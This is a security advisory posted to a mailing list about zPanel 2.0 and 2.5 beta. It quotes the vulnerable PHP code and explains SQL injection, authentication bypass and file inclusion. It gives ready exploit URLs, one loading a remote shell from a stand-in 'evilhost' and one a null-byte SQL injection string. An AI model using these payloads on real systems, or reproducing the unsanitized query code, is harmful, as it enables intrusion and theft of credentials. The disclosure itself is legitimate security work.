Few remote bugs in zPanel

[Mik- <misha () dom no>]

Hello,

Few bugs have been discovered (accidently) in zPanel.
Developers were notified on 07.March but I have not received any 
response.

Best regards,                           Mikhail.
-------------------------------------------------------------

[Product Description]
"ZPanel is a hosting control interface developed for both Windows and 
Linux hosts.
We will soon be developing two different distributions to fit the needs of 
both
platforms."
Tested:
ZPanel has been tested on the following server operating systems:
Windows                                 Linux
2000 Advanced Server                    Fedora 2
2000 Server                             FreeBSD 4.9, 5.2.1
2003 Enterprise Server                  Mandrake 9.1, 9.2
XP                                      RedHat 7.3, 9

Versions:
Stable - ZPanel v2.0
Latest Beta - ZPanel v2.5b10

[Summary]
Successful exploitation of an input validation vulnerability in ZPanel 
scripts
allows attackers to execute SQL commands, include remote and local files,
get sensetive information.

[Details]
[1] SQL injection #1

Vulnarable script: index.php
Vulnerable code:
--[code]--
if (isset($_POST['uname'])) {

        mysql_select_db($database_Customer_Database, $Customer_Database);
        $query_TempUser = sprintf("SELECT * FROM custumerbase WHERE 
servicename = '".$_POST['uname']."'");
--[/code]--

Not sanitizing userinput variable outbounds directly into SQL query.
It is possible to inject arbitrary SQL statements through 'uname' variable 
and bypass the authentification.

In case of invalid user name or password user can see which parameter is 
wrong.
As result:
SQL onechar bruteforce technique allows to get sensitive information
(such as nonencrypted passwords in ZPanel v.2, and md5 hashes in ZPanel 
v.<=2.5 beta 10).

[2] SQL injection #2 and file inclusion

Vulnerable script: zpanel.php
Vulnerable code:
--[code v.2.5 beta]--
if (isset($_GET['page']) && $_GET['page'] != 'main') {
        $query_Modules = sprintf("SELECT * FROM modules WHERE name = 
'".$_GET['page']."'");
        $Modules = mysql_query($query_Modules, $Customer_Database) or 
die(mysql_error());
        $row_Modules = mysql_fetch_assoc($Modules);
[...]
                        if ($row_Modules['active'] == '1') {
                                $body = "modules/" . $_GET['page'] . 
"/index.php";
--[/code]--

or

--[code v.2.0]--
if (!isset($_GET['page'])){
        $body = "main.php";
}else{
        $body = $_GET['page'] . ".php";
}
--[/code]--

It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1

Path disclosing avaliable in case of unsuccessfull exploitation of this 
bug.

[3] Installation
By default, installation scripts are not taken away after installation.

http://localhost/ZPanel/admin/install.php

[4] Old scripts
ZPanel uses old buggy scripts. For example
phpBB Forums 2.0.8a.


[DISCLOSURE TIMELINE]

10-03-2005  Initial vendor notification.

[CREDITS & GREETS]
Goes to GHC & specially to Foster